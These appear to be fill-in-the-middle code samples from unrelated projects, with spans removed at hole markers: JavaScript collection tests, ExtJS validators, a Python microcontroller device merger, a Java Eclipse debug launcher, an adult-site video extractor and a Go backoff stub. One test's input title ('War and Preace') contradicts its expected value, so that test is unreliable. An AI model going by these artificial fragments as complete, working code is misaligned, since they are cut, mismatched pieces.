const foos = new Collection([{ name: "John", bar_id: 123 }]);
const server = new Server();
server.addCollection("foos", foos);
expect(() => {
foos.getAll({ embed: ["bar"] });
}).toThrow(new Error("Can't embed a non-existing collection bar"));
});
it("should return the original object for missing embed one", () => {
const foos = new Collection([{ name: "John", bar_id: 123 }]);
const bars = new Collection([]);
const server = new Server();
server.addCollection("foos", foos);
server.addCollection("bars", bars);
const expected = [{ id: 0, name: "John", bar_id: 123 }];
expect(foos.getAll({ embed: ["bar"] })).toEqual(expected);
});
it("should return the object with the reference object for embed one", () => {
const foos = new Collection([
{ name: "John", bar_id: 123 },
{ name: "Jane", bar_id: 456 },
]);
const bars = new Collection([
{ id: 1, bar: "nobody wants me" },
{ id: 123, bar: "baz" },
{ id: 456, bar: "bazz" },
]);
const server = new Server();
server.addCollection("foos", foos);
server.addCollection("bars", bars);
const expected = [
{ id: 0, name: "John", bar_id: 123, bar: { id: 123, bar: "baz" } },
{ id: 1, name: "Jane", bar_id: 456, bar: { id: 456, bar: "bazz" } },
];
expect(foos.getAll({ embed: ["bar"] })).toEqual(expected);
});
it("should throw an error when trying to embed many a non-existing collection", () => {
const foos = new Collection([{ name: "John", bar_id: 123 }]);
const server = new Server();
server.addCollection("foos", foos);
expect(() => {
foos.getAll({ embed: ["bars"] });
}).toThrow(new Error("Can't embed a non-existing collection bars"));
});
it("should return the object with an empty array for missing embed many", () => {
const foos = new Collection([{ name: "John", bar_id: 123 }]);
const bars = new Collection([{ id: 1, bar: "nobody wants me" }]);
const server = new Server();
server.addCollection("foos", foos);
server.addCollection("bars", bars);
const expected = [{ id: 1, bar: "nobody wants me", foos: [] }];
expect(bars.getAll({ embed: ["foos"] })).toEqual(expected);
});
it("should return the object with an array of references for embed many", () => {
const foos = new Collection([
{ id: 1, name: "John", bar_id: 123 },
{ id: 2, name: "Jane", bar_id: 456 },
{ id: 3, name: "Jules", bar_id: 456 },
]);
const bars = new Collection([
{ id: 1, bar: "nobody wants me" },
{ id: 123, bar: "baz" },
{ id: 456, bar: "bazz" },
]);
const server = new Server();
server.addCollection("foos", foos);
server.addCollection("bars", bars);
const expected = [
{ id: 1, bar: "nobody wants me", foos: [] },
{ id: 123, bar: "baz", foos: [{ id: 1, name: "John", bar_id: 123 }] },
{
id: 456,
bar: "bazz",
foos: [
{ id: 2, name: "Jane", bar_id: 456 },
{ id: 3, name: "Jules", bar_id: 456 },
],
},
];
expect(bars.getAll({ embed: ["foos"] })).toEqual(expected);
});
it("should return the object with an array of references for embed many using inner array", () => {
const foos = new Collection([
{ id: 1, name: "John" },
{ id: 2, name: "Jane" },
{ id: 3, name: "Jules" },
]);
const bars = new Collection([
{ id: 1, bar: "nobody wants me" },
{ id: 123, bar: "baz", foos: [1] },
{ id: 456, bar: "bazz", foos: [2, 3] },
]);
const server = new Server();
server.addCollection("foos", foos);
server.addCollection("bars", bars);
const expected = [
{ id: 1, bar: "nobody wants me", foos: [] },
{ id: 123, bar: "baz", foos: [{ id: 1, name: "John" }] },
{
id: 456,
bar: "bazz",
foos: [
{ id: 2, name: "Jane" },
{ id: 3, name: "Jules" },
],
},
];
expect(bars.getAll({ embed: ["foos"] })).toEqual(expected);
});
it("should allow multiple embeds", () => {
const books = new Collection([
{ id: 1, title: "Pride and Prejudice", author_id: 1 },
{ id: 2, title: "Sense and Sensibility", author_id: 1 },
{ id: 3, title: "War and Preace", author_id: 2 },
]);
const authors = new Collection([
{ id: 1, firstName: "Jane", lastName: "Austen", country_id: 1 },
{ id: 2, firstName: "Leo", lastName: "Tosltoi", country_id: 2 },
]);
const countries = new Collection([
{ id: 1, name: "England" },
{ id: 2, name: "Russia" },
]);
const server = new Server();
server.addCollection("books", books);
server.addCollection("authors", authors);
server.addCollection("countrys", countries); // nevermind the plural
const expected = [
{
id: 1,
firstName: "Jane",
lastName: "Austen",
country_id: 1,
books: [
{ id: 1, title: "Pride and Prejudice", author_id: 1 },
{ id: 2, title: "Sense and Sensibility", author_id: 1 },
],
country: { id: 1, name: "England" },
},
{
id: 2,
firstName: "Leo",
lastName: "Tosltoi",
country_id: 2,
          books: [{ id: 3, title: "War and Peace", author_id: 2 }],
country: { id: 2, name: "Russia" },
},
];
expect(authors.getAll({ embed: ["books", "country"] })).toEqual(
expected
);
});
});
describe("composite query", () => {
it("should execute all commands of the query object", () => {
const collection = new Collection([
{ id: 0, name: "c", arg: false },
{ id: 1, name: "b", arg: true },
{ id: 2, name: "a", arg: true },
]);
const query = {
filter: { arg: true },
sort: "name",
};
const expected = [
{ id: 2, name: "a", arg: true },
{ id: 1, name: "b", arg: true },
];
expect(collection.getAll(query)).toEqual(expected);
});
});
});
describe("getOne", () => {
it("should throw an exception when trying to get a non-existing item", () => {
const collection = new Collection();
expect(() => {
collection.getOne(0);
}).toThrow(new Error("No item with identifier 0"));
});
it("should return the first collection matching the identifier", () => {
const collection = new Collection([
{ id: 1, name: "foo" },
{ id: 2, name: "bar" },
]);
expect(collection.getOne(1)).toEqual({ id: 1, name: "foo" });
expect(collection.getOne(2)).toEqual({ id: 2, name: "bar" });
});
it("should use the identifierName", () => {
const collection = new Collection(
[
{ _id: 1, name: "foo" },
{ _id: 2, name: "bar" },
],
"_id"
);
expect(collection.getOne(1)).toEqual({ _id: 1, name: "foo" });
expect(collection.getOne(2)).toEqual({ _id: 2, name: "bar" });
});
});
describe("addOne", () => {
it("should return the item inserted", () => {
const collection = new Collection();
const r = collection.addOne({ name: "foo" });
expect(r.name).toEqual("foo");
});
it("should add the item", () => {
const collection = new Collection();
collection.addOne({ name: "foo" });
expect(collection.getOne(0)).toEqual({ id: 0, name: "foo" });
});
it("should incement the sequence at each insertion", () => {
const collection = new Collection();
expect(collection.sequence).toEqual(0);
collection.addOne({ name: "foo" });
expect(collection.sequence).toEqual(1);
collection.addOne({ name: "foo" });
expect(collection.sequence).toEqual(2);
});
it("should set identifier if not provided", () => {
const collection = new Collection();
const r1 = collection.addOne({ name: "foo" });
expect(r1.id).toEqual(0);
const r2 = collection.addOne({ name: "bar" });
expect(r2.id).toEqual(1);
});
it("should refuse insertion with existing identifier", () => {
const collection = new Collection([{ name: "foo" }]);
expect(() => {
collection.addOne({ id: 0, name: "bar" });
}).toThrow(new Error("An item with the identifier 0 already exists"));
});
it("should accept insertion with non-existing identifier and move sequence accordingly", () => {
const collection = new Collection();
collection.addOne({ name: "foo" });
collection.addOne({ id: 12, name: "bar" });
expect(collection.sequence).toEqual(13);
const r = collection.addOne({ name: "bar" });
expect(r.id).toEqual(13);
});
});
describe("updateOne", () => {
it("should throw an exception when trying to update a non-existing item", () => {
const collection = new Collection();
expect(() => {
collection.updateOne(0, { id: 0, name: "bar" });
}).toThrow(new Error("No item with identifier 0"));
});
it("should return the updated item", () => {
const collection = new Collection([{ name: "foo" }]);
expect(collection.updateOne(0, { id: 0, name: "bar" })).toEqual({
id: 0,
name: "bar",
});
});
it("should update the item", () => {
const collection = new Collection([{ name: "foo" }, { name: "baz" }]);
collection.updateOne(0, { id: 0, name: "bar" });
expect(collection.getOne(0)).toEqual({ id: 0, name: "bar" });
expect(collection.getOne(1)).toEqual({ id: 1, name: "baz" });
});
});
describe("removeOne", () => {
it("should throw an exception when trying to remove a non-existing item", () => {
const collection = new Collection();
expect(() => {
collection.removeOne(0);
}).toThrow(new Error("No item with identifier 0"));
});
it("should remove the item", () => {
const collection = new Collection();
const item = collection.addOne({ name: "foo" });
collection.removeOne(item.id);
expect(collection.getAll()).toEqual([]);
});
it("should return the removed item", () => {
const collection = new Collection();
const item = collection.addOne({});
const r = collection.removeOne(item.id);
expect(r).toEqual(item);
});
it("should decrement the sequence only if the removed item is the last", () => {
const collection = new Collection([{ id: 0 }, { id: 1 }, { id: 2 }]);
expect(collection.sequence).toEqual(3);
collection.removeOne(2);
expect(collection.sequence).toEqual(2);
collection.removeOne(0);
expect(collection.sequence).toEqual(2);
const r = collection.addOne({});
expect(r.id).toEqual(2);
});
});
});<|fim▁end|>
|
});
it("should accept a query object", () => {
const collection = new Collection([{}, { name: "a" }, { name: "b" }]);
|
<|file_name|>BasicForm.js<|end_file_name|><|fim▁begin|>Ext.form.BasicForm.override({
resetDirty: function() {
this.items.each(function(field) {
field.resetDirty();
});
},
setDefaultValues: function() {
this.items.each(function(field) {
field.setDefaultValue();
}, this);
},
clearValues: function() {
this.items.each(function(field) {
if (field.rendered) field.clearValue();
}, this);
},
//override stupid Ext behavior
//better to ask the individual form fields
//needed for: Checkbox, ComboBox, SwfUpload, Date...
getValues: function() {
var ret = {};
this.items.each(function(field) {
if (field.getName && field.getName()) {
ret[field.getName()] = field.getValue();
}<|fim▁hole|>});
Ext.apply(Ext.form.VTypes, {
    // As of Ext 2.2, e-mail validation no longer allowed hyphens; now it allows them again
email: function(v) {
return /^([a-zA-Z0-9_.+-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$/.test(v);
},
emailMask : /[a-z0-9_\.\-@+]/i, //include +
urltel: function(v) {
return /^(tel:\/\/[\d\s]+|(((https?)|(ftp)):\/\/([\-\w]+\.)+\w{2,3}(\/[%\-\w]+(\.\w{2,})?)*(([\w\-\.\?\\\/+@&#;`~=%!]*)(\.\w{2,})?)*\/?))+$/.test(v);
},
urltelTest: trlKwf('This field should be a URL in the format "http://www.domain.com" or tel://0043 1234'),
    // Replaces everything except a-z, 0-9 and - with _ (like Kwf_Filter_Ascii).
    // Overrides the standard Ext implementation in order to allow the - character.
alphanum: function(v) {
return /^[a-zA-Z0-9_\-]+$/.test(v);
},
alphanumText : trlKwf('This field should only contain letters, numbers, - and _'),
alphanumMask : /[a-z0-9_\-]/i,
num: function(v) {
return /^[0-9]+$/.test(v);
},
numText : trlKwf('This field should only contain numbers'),
numMask : /[0-9]/,
time: function(val, field) {
return /^([0-9]{2}):([0-9]{2}):([0-9]{2})$/i.test(val);
},
timeText: trlKwf('Not a valid time. Must be in the format "12:34:00".'),
timeMask: /[\d:]/i
});<|fim▁end|>
|
}, this);
return ret;
}
|
<|file_name|>merger.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright (c) 2013, Roboterclub Aachen e.V.
# All rights reserved.
#
# The file is part of the xpcc library and is released under the 3-clause BSD
# license. See the file `LICENSE` for the full license governing this code.
# -----------------------------------------------------------------------------
from logger import Logger
class DeviceMerger:
""" DeviceMerger
Merges several devices into logical groups.
Since most Devices have the same peripherals, but differ in other
parameters, like Flash/RAM/EEPROM sizes, packaging or other minor
differences, it makes sense to group them accordingly.
    Please note that this class only makes the resulting XML files more user
friendly to manually edit, since the user does not have to apply the
changes to multiple files. Ideally - reality might differ :(.
"""
def __init__(self, devices, logger=None):
self.mergedDevices = list(devices)
        if logger is None:
            self.log = Logger()
        else:
            self.log = logger
def mergedByPlatform(self, platform):
if platform == 'avr':
self.mergedByType()
self.mergedByName()
elif platform == 'stm32':
self.mergedBySize()
self.mergedByName()
def mergedByType(self):
self.mergedDevices = self._mergeDevicesByType(self.mergedDevices)
def mergedByName(self):
self.mergedDevices = self._mergeDevicesByName(self.mergedDevices)
def mergedBySize(self):
self.mergedDevices = self._mergeDevicesBySize(self.mergedDevices)
def _mergeDevicesByName(self, devices):
"""
This is a simple helper method to merge devices based on name.
"""
avrDevices = []
xmegaDevices = []
stm32Devices = []
result = []
for dev in devices:
if dev.ids.intersection.platform == 'avr':
if dev.ids.intersection.family == 'xmega':
xmegaDevices.append(dev)
else:
avrDevices.append(dev)
elif dev.ids.intersection.platform == 'stm32':
stm32Devices.append(dev)
else:
result.append(dev)
avrDevices = self._mergeDevicesByNameAVR(avrDevices)
xmegaDevices = self._mergeDevicesByNameXMEGA(xmegaDevices)
stm32Devices = self._mergeDevicesByNameSTM32(stm32Devices)
result.extend(avrDevices)
result.extend(xmegaDevices)
result.extend(stm32Devices)
return result
def _mergeDevicesByNameSTM32(self, devices):
"""
This checks the size-id and name of the devices, and merges the devices
based on the observation, that the size-id only influences the size of
memories, i.e. FLASH, RAM.
"""
# copy the devices, since this array will be modified
devs = list(devices)
merged = []
while len(devs) > 0:
current = devs[0]
devs.remove(current)
matches = []
name_ids = self._getCategoryNameSTM32(current)
size_ids = self._getCategorySizeSTM32(current)
self.log.info("ByName: Searching for device with names '%s' and size-ids '%s'" % (name_ids, size_ids))
for dev in devs:
if dev.ids.getAttribute('name')[0] in name_ids and \
dev.ids.getAttribute('size_id')[0] in size_ids:
matches.append(dev)
for match in matches:
devs.remove(match)
current = current.getMergedDevice(match)
if len(matches) == 0:
self.log.info("ByName: no match for device: " + current.id.string)
self.log.debug("ByName:\nResulting device:\n" + str(current))
merged.append(current)
return merged
def _getCategoryNameSTM32(self, device):
names = device.ids.getAttribute('name')
family = device.id.family
if family == 'f0':
categories = [ ['030', '050', '070'],
['031', '051', '071', '091'],
['042', '072'],
['038', '048', '058', '078', '098']]
elif family == 'f1':
categories = [ ['100'],
['101', '102'],
['103'],
['105', '107'] ]
elif family == 'f2':
categories = [ ['205', '207', '215', '217'] ]
elif family == 'f3':
categories = [ ['301'],
['302'],
['303'],
['334'],
['318', '328', '358', '378', '398'],
['373'] ]
elif family == 'f4':
categories = [ ['401', '411'],
['410'],
['412'],
['405', '415', '407', '417'],
['427', '437', '429', '439'],
['446'],
['469', '479'] ]
elif family == 'f7':
categories = [ ['745', '746', '756'],
['765', '767', '768', '769', '777', '778', '779'] ]
# make sure that only one category is used!
for cat in categories:
if names[0] in cat:
return cat
return categories[0]
def _mergeDevicesByNameXMEGA(self, devices):
"""
This checks the size-id and name of the devices, and merges the devices
based on the observation, that the size-id only influences the size of
memories, i.e. FLASH, RAM, and EEPROM.
"""
# copy the devices, since this array will be modified
devs = list(devices)
merged = []
while len(devs) > 0:
current = devs[0]
devs.remove(current)
matches = []
device_type = current.ids.getAttribute('type')[0]
if device_type != None:
self.log.info("ByName: Searching for device with type '%s'" % device_type)
for dev in devs:
if dev.ids.getAttribute('type')[0] == device_type:
# A3 none|b and bu|u are different enough to warrant
# a new device file
if device_type == 'a3':
if dev.ids.getAttribute('pin_id')[0] in self._getCategoryPinIdAVR(current):
matches.append(dev)
else:
matches.append(dev)
for match in matches:
devs.remove(match)
current = current.getMergedDevice(match)
if len(matches) == 0:
self.log.info("ByName: no match for device: " + current.id.string)
self.log.debug("ByName:\nResulting device:\n" + str(current))
merged.append(current)
return merged
def _mergeDevicesByNameAVR(self, devices):
"""
This checks the size-id and name of the devices, and merges the devices
based on the observation, that the size-id only influences the size of
memories, i.e. FLASH, RAM, and EEPROM.
"""
# copy the devices, since this array will be modified
devs = list(devices)
merged = []
while len(devs) > 0:
current = devs[0]
devs.remove(current)
matches = []
size_id = current.ids.getAttribute('size_id')[0]
if size_id != None:
name = current.ids.getAttribute('name')[0]
device_type = current.ids.getAttribute('type')[0]
family = name[len(size_id):]
if not (family == "" and device_type == None):
device_type = self._getCategoryTypeAVR(current)
self.log.info("ByName: Searching for device ending in '"
+ family + "' and '" + str(device_type) + "'")
for dev in devs:
dname = dev.ids.getAttribute('name')[0]
dsize_id = dev.ids.getAttribute('size_id')[0]
                        # if they do not have a size-id they are probably unmergeable
if dsize_id != None:
dfamily = dname[len(dsize_id):]
                            # prepare for type comparison
# we should only merge when the family is the same,
# and if the type is the same
if dfamily == family and dev.ids.getAttribute('type')[0] in device_type:
matches.append(dev)
# The following code is Atmel's fault with their stupid naming schemes.
# the AT90's, ATmega's and ATtiny's have special merging rules
if current.id.family == "at90":
name = current.id.name
# Some Devices are just not in the same group
if name in ['1', '2', '3', '216', '316', '646', '647', '1286', '1287']:
# these are not the matches you are looking for *move hand*
matches = []
                # these are not the devices you want to be matched with
for match in matches:
if match.id.name in ['1', '2', '3', '216', '316', '646', '647', '1286', '1287']:
matches.remove(match)
break
# but these are:
namesA = [ ['1', '2', '216'], ['3', '316'], ['646', '647', '1286', '1287'] ]
for names in namesA:
if name in names:
                        for dev in [d for d in devs if d.id.family == "at90"]:
for dname in dev.ids.getAttribute('name'):
if dname in names:
matches.append(dev)
if current.id.family == "atmega":
name = current.id.name
if current.ids.getAttribute('type')[0] in [None, 'none', 'p', 'a', 'pa']:
# Some Devices are just not in the same group
if name in ['8', '16', '32', '64', '128']:
# these are not the matches you are looking for *move hand*
matches = []
# these are not the devices you want to be matched with
for match in matches:
if match.id.name in ['8', '16', '32', '64', '128']:
matches.remove(match)
break
# but these are:
namesA = [ ['16', '32'], ['64', '128'] ]
for names in namesA:
if name in names:
for dev in devs:
if dev.id.family == "atmega" and dev.ids.getAttribute('type')[0] in [None, 'none', 'p', 'a', 'pa']:
for dname in dev.ids.getAttribute('name'):
if dname in names:
matches.append(dev)
if current.id.family == "attiny":
name = current.id.name
names = ['4', '5', '9', '10']
if name in names:
for dev in devs:
if dev.id.family == "attiny":
for dname in dev.ids.getAttribute('name'):
if dname in names:
matches.append(dev)
# Some Devices are just not in the same group
if name in ['28', '20', '40']:
# these are not the matches you are looking for *move hand*
matches = []
                # these are not the devices you want to be matched with
for match in matches:
if match.id.name in ['28', '20', '40']:
matches.remove(match)
break
for match in matches:
devs.remove(match)
current = current.getMergedDevice(match)
if len(matches) == 0:
self.log.info("ByName: no match for device: " + current.id.string)
self.log.debug("ByName:\nResulting device:\n" + str(current))
merged.append(current)
return merged
def _mergeDevicesBySize(self, devices):
"""
This is a simple helper method to merge devices based on size.
"""
stm32Devices = []
result = []
for dev in devices:
if dev.id.platform == 'stm32':
stm32Devices.append(dev)
else:
result.append(dev)
stm32Devices = self._mergeDevicesBySizeSTM32(stm32Devices)
result.extend(stm32Devices)
return result
def _mergeDevicesBySizeSTM32(self, devices):
"""
This checks the size-id and name of the devices, and merges the devices
based on the observation, that the size-id only influences the size of
memories, i.e. FLASH, RAM.
"""
# copy the devices, since this array will be modified
devs = list(devices)
merged = []
while len(devs) > 0:
current = devs[0]
devs.remove(current)
matches = []
size_ids = self._getCategorySizeSTM32(current)
name = current.ids.getAttribute('name')[0]
self.log.info("BySize: Searching for device with size-id '%s'" % size_ids)
for dev in devs:
if dev.ids.getAttribute('name')[0] == name and \
dev.ids.getAttribute('size_id')[0] in size_ids:
matches.append(dev)
matches.sort(key=lambda k : int(k.getProperty('pin-count').values[0].value), reverse=True)
for match in matches:
devs.remove(match)
current = current.getMergedDevice(match)
if len(matches) == 0:
self.log.info("BySize: no match for device: " + current.id.string)
self.log.debug("BySize:\nResulting device:\n" + str(current))
merged.append(current)
return merged
def _getCategorySizeSTM32(self, device):
size_ids = device.ids.getAttribute('size_id')
family = device.id.family
name = device.ids.getAttribute('name')[0]
# these categories are dependent on name
# these are the categories of mergeable size-ids
if family == 'f0':
categories = [ ['4', '6'],
['8'],
['b', 'c'] ]
if name in ['072', '042']:
categories = [['4', '6'], ['8', 'b']]
elif family == 'f1':
categories = [ ['4', '6'], # low density
['8', 'b'], # medium density
['c', 'd', 'e'], # high density
['f', 'g'] ] # super high density
if name in ['105', '107']:
categories = [ ['8', 'b', 'c'] ] # medium and high density
elif family == 'f2':
categories = [ ['b', 'c', 'd', 'e', 'f', 'g'] ] # high density
elif family == 'f3':
categories = [ ['4', '6', '8'], ['b', 'c', 'd', 'e'] ]
if name in ['373']:
categories = [['8', 'b', 'c']]
elif family == 'f4':
categories = [ ['8', 'b', 'c', 'd'],
['e', 'g', 'i'] ]
if name in ['401']:
categories = [ ['b', 'c', 'd', 'e'] ]
if name in ['411', '412', '446']:
categories = [['c', 'e', 'g']]
elif family == 'f7':
categories = [['e', 'g', 'i']]
# make sure that only one category is used!
for cat in categories:
if size_ids[0] in cat:
return cat
return categories[0]
def _mergeDevicesByType(self, devices):
"""
This is a simple helper method to merge devices based on type.
"""
avrDevices = []
result = []
for dev in devices:
if dev.id.platform == 'avr' and dev.id.family != 'xmega':
avrDevices.append(dev)
else:
result.append(dev)
avrDevices = self._mergeDevicesByTypeAVR(avrDevices)
result.extend(avrDevices)
return result
def _mergeDevicesByTypeAVR(self, devices):
"""
This checks the name suffix (for example 'P', 'A', 'PA') of the
devices and merges them based on the observation, that the suffix
does not have anything to do with the mapping of peripherals.
"""
devs = list(devices)
merged = []
while len(devs) > 0:
current = devs[0]
devs.remove(current)
props = current.id
if props.valid == False:
continue
matches = []
suffix = self._getCategoryTypeAVR(current)
self.log.info("ByType: Searching for device ending in " + str(suffix))
for dev in devs:<|fim▁hole|> matches.append(dev)
for match in matches:
devs.remove(match)
current = current.getMergedDevice(match)
if len(matches) == 0:
self.log.info("ByType: No match for device: " + current.id.string)
self.log.debug("ByType:\nResulting device:\n" + str(current))
merged.append(current)
return merged
def _getCategoryPinIdAVR(self, device):
device_type = device.ids.getAttribute('pin_id')[0]
        # these are the categories of mergeable types
categories = [ # Xmega devices
[None, 'none', 'b'],
['bu', 'u'],
]
# make sure that only one category is used!
for cat in categories:
if device_type in cat:
return cat
return categories[0]
def _getCategoryTypeAVR(self, device):
device_type = device.ids.getAttribute('type')[0]
        # these are the categories of mergeable types
categories = [ # ATmega devices
[None, 'none', 'p', 'a', 'pa'],
['rfa1', 'rfa2', 'rfr1', 'rfr2'],
['hvb', 'hvbrevb'],
['hve2'],
['hva'],
['u2'],
['u4', 'u6'],
['m1', 'c1'],
# AT90 devices
['can'],
['pwm'],
['usb'],
]
# make sure that only one category is used!
for cat in categories:
if device_type in cat:
return cat
return categories[0]<|fim▁end|>
|
if dev.id.name == props.name and dev.id.type in suffix:
|
<|file_name|>banner_min.js<|end_file_name|><|fim▁begin|>/*! @license pzprv3-ui.js v<%= pkg.version %> (c) 2009-<%= grunt.template.today('yyyy') %> <%= pkg.author %>, MIT license<|fim▁hole|><|fim▁end|>
|
* https://bitbucket.org/sabo2/pzprv3 */
|
<|file_name|>DebugActionDelegate.java<|end_file_name|><|fim▁begin|>/* COPYRIGHT-ENEA-SRC-R2 *
**************************************************************************
* Copyright (C) 2005-2007 by Enea Software AB.
* All rights reserved.
*
* This Software is furnished under a software license agreement and
* may be used only in accordance with the terms of such agreement.
* Any other use or reproduction is prohibited. No title to and
* ownership of the Software is hereby transferred.
*
* PROPRIETARY NOTICE
* This Software consists of confidential information.
* Trade secret law and copyright law protect this Software.
* The above notice of copyright on this Software does not indicate
* any actual or intended publication of such Software.
**************************************************************************
* COPYRIGHT-END */
package com.ose.cdt.launch.internal;
import org.eclipse.cdt.debug.core.ICDTLaunchConfigurationConstants;
import org.eclipse.cdt.debug.mi.core.IMILaunchConfigurationConstants;
import org.eclipse.core.runtime.CoreException;
import org.eclipse.debug.core.DebugPlugin;
import org.eclipse.debug.core.ILaunchConfiguration;
import org.eclipse.debug.core.ILaunchConfigurationType;
import org.eclipse.debug.core.ILaunchConfigurationWorkingCopy;
import org.eclipse.debug.core.ILaunchManager;
import org.eclipse.debug.ui.IDebugUIConstants;
import org.eclipse.jface.action.IAction;
import org.eclipse.jface.viewers.ISelection;
import org.eclipse.jface.viewers.IStructuredSelection;
import com.ose.cdt.debug.mi.core.GDBDebugger;
import com.ose.cdt.debug.mi.core.IOSEMILaunchConfigurationConstants;
import com.ose.cdt.launch.internal.ui.LaunchUIPlugin;
import com.ose.launch.IOSELaunchConfigurationConstants;
import com.ose.system.Block;
import com.ose.system.Gate;
import com.ose.system.Process;
import com.ose.system.SystemModelNode;
import com.ose.system.Target;
public class DebugActionDelegate extends LaunchActionDelegate
{
private Process node;
public void selectionChanged(IAction action, ISelection selection)
{
Object obj = null;
if (selection instanceof IStructuredSelection)
{
obj = ((IStructuredSelection) selection).getFirstElement();
}
node = ((obj instanceof Process) ? ((Process) obj) : null);
}
protected SystemModelNode getSystemModelNode()
{
return node;
}
protected String getLaunchMode()
{
return ILaunchManager.DEBUG_MODE;
}
protected String getLaunchGroup()
{
return IDebugUIConstants.ID_DEBUG_LAUNCH_GROUP;
}
protected ILaunchConfigurationType getLaunchConfigurationType()
{
String configTypeId;
ILaunchConfigurationType configType;
if (node == null)
{
throw new IllegalStateException();
}
configTypeId = (node.getTarget().isPostMortemMonitor() ?
IOSELaunchConfigurationConstants.ID_LAUNCH_DUMP :
(node.getBlock().getSid() == 0) ?
IOSELaunchConfigurationConstants.ID_LAUNCH_CORE_MODULE :
IOSELaunchConfigurationConstants.ID_LAUNCH_LOAD_MODULE);
configType = DebugPlugin.getDefault().getLaunchManager()
.getLaunchConfigurationType(configTypeId);
return configType;
}
protected ILaunchConfiguration editLaunchConfiguration(
ILaunchConfigurationWorkingCopy wc,
String configTypeId,
SystemModelNode node)
{
ILaunchConfiguration config = null;
if (!(node instanceof Process))
{
return null;
}
try
{
Process process = (Process) node;
Block block = process.getBlock();
Target target = block.getTarget();
Gate gate = target.getGate();
wc.setAttribute(
IOSELaunchConfigurationConstants.ATTR_GATE_ADDRESS,
gate.getAddress().getHostAddress());
wc.setAttribute(
IOSELaunchConfigurationConstants.ATTR_GATE_PORT,
gate.getPort());
wc.setAttribute(
IOSELaunchConfigurationConstants.ATTR_TARGET_HUNT_PATH,
target.getHuntPath());
if (configTypeId.equals(IOSELaunchConfigurationConstants.ID_LAUNCH_CORE_MODULE))
{
wc.setAttribute(
IOSELaunchConfigurationConstants.ATTR_BOOT_DOWNLOAD,
false);
}
else if (configTypeId.equals(IOSELaunchConfigurationConstants.ID_LAUNCH_LOAD_MODULE))
{
wc.setAttribute(
IOSELaunchConfigurationConstants.ATTR_LM_DOWNLOAD,
false);
}
else if (configTypeId.equals(IOSELaunchConfigurationConstants.ID_LAUNCH_DUMP))
{
wc.setAttribute(
IOSELaunchConfigurationConstants.ATTR_DUMP_MONITOR_MANAGED,
false);<|fim▁hole|> wc.setAttribute(ICDTLaunchConfigurationConstants.ATTR_DEBUGGER_ID,
IOSEMILaunchConfigurationConstants.OSE_DEBUGGER_ID);
if (target.isPostMortemMonitor())
{
wc.setAttribute(
ICDTLaunchConfigurationConstants.ATTR_DEBUGGER_START_MODE,
ICDTLaunchConfigurationConstants.DEBUGGER_MODE_CORE);
}
else
{
wc.setAttribute(
ICDTLaunchConfigurationConstants.ATTR_DEBUGGER_START_MODE,
ICDTLaunchConfigurationConstants.DEBUGGER_MODE_RUN);
}
wc.setAttribute(
ICDTLaunchConfigurationConstants.ATTR_DEBUGGER_STOP_AT_MAIN,
false);
wc.setAttribute(IMILaunchConfigurationConstants.ATTR_DEBUGGER_PROTOCOL,
"mi");
if (wc.getAttribute(IMILaunchConfigurationConstants.ATTR_DEBUG_NAME,
(String) null) == null)
{
wc.setAttribute(IMILaunchConfigurationConstants.ATTR_DEBUG_NAME,
getGDB(process));
}
wc.setAttribute(IOSEMILaunchConfigurationConstants.ATTR_DEBUG_SCOPE,
getDebugScope());
wc.setAttribute(IOSEMILaunchConfigurationConstants.ATTR_SEGMENT_ID,
"0x" + Integer.toHexString(block.getSid()).toUpperCase());
wc.setAttribute(IOSEMILaunchConfigurationConstants.ATTR_BLOCK_ID,
"0x" + Integer.toHexString(process.getBid()).toUpperCase());
wc.setAttribute(IOSEMILaunchConfigurationConstants.ATTR_PROCESS_ID,
"0x" + Integer.toHexString(process.getId()).toUpperCase());
config = wc.doSave();
}
catch (CoreException e)
{
LaunchUIPlugin.log(e);
}
return config;
}
private static String getGDB(Process process)
{
String gdbName;
String gdbPath;
switch (process.getTarget().getCpuType())
{
case Target.CPU_ARM:
gdbName = IOSEMILaunchConfigurationConstants.VALUE_DEBUG_NAME_ARM;
break;
case Target.CPU_MIPS:
gdbName = IOSEMILaunchConfigurationConstants.VALUE_DEBUG_NAME_MIPS;
break;
case Target.CPU_PPC:
gdbName = IOSEMILaunchConfigurationConstants.VALUE_DEBUG_NAME_POWERPC;
break;
default:
return IOSEMILaunchConfigurationConstants.VALUE_DEBUG_NAME_NATIVE;
}
gdbPath = GDBDebugger.findGDB(gdbName);
return ((gdbPath != null) ? gdbPath : gdbName);
}
}<|fim▁end|>
|
}
|
<|file_name|>anysex.py<|end_file_name|><|fim▁begin|>from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
parse_duration,
int_or_none,
)
class AnySexIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?anysex\.com/(?P<id>\d+)'
_TEST = {<|fim▁hole|> 'id': '156592',
'ext': 'mp4',
'title': 'Busty and sexy blondie in her bikini strips for you',
'description': 'md5:de9e418178e2931c10b62966474e1383',
'categories': ['Erotic'],
'duration': 270,
'age_limit': 18,
}
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group('id')
webpage = self._download_webpage(url, video_id)
video_url = self._html_search_regex(r"video_url\s*:\s*'([^']+)'", webpage, 'video URL')
title = self._html_search_regex(r'<title>(.*?)</title>', webpage, 'title')
description = self._html_search_regex(
r'<div class="description"[^>]*>([^<]+)</div>', webpage, 'description', fatal=False)
thumbnail = self._html_search_regex(
r'preview_url\s*:\s*\'(.*?)\'', webpage, 'thumbnail', fatal=False)
categories = re.findall(
r'<a href="http://anysex\.com/categories/[^"]+" title="[^"]*">([^<]+)</a>', webpage)
duration = parse_duration(self._search_regex(
r'<b>Duration:</b> (?:<q itemprop="duration">)?(\d+:\d+)', webpage, 'duration', fatal=False))
view_count = int_or_none(self._html_search_regex(
r'<b>Views:</b> (\d+)', webpage, 'view count', fatal=False))
return {
'id': video_id,
'url': video_url,
'ext': 'mp4',
'title': title,
'description': description,
'thumbnail': thumbnail,
'categories': categories,
'duration': duration,
'view_count': view_count,
'age_limit': 18,
}<|fim▁end|>
|
'url': 'http://anysex.com/156592/',
'md5': '023e9fbb7f7987f5529a394c34ad3d3d',
'info_dict': {
|
<|file_name|>backoff.go<|end_file_name|><|fim▁begin|>package backoff
import (
"math"
"time"
"github.com/quan-xie/tuba/util/xtime"
)
// Backoff interface defines contract for backoff strategies
type Backoff interface {
Next(retry int) time.Duration
}
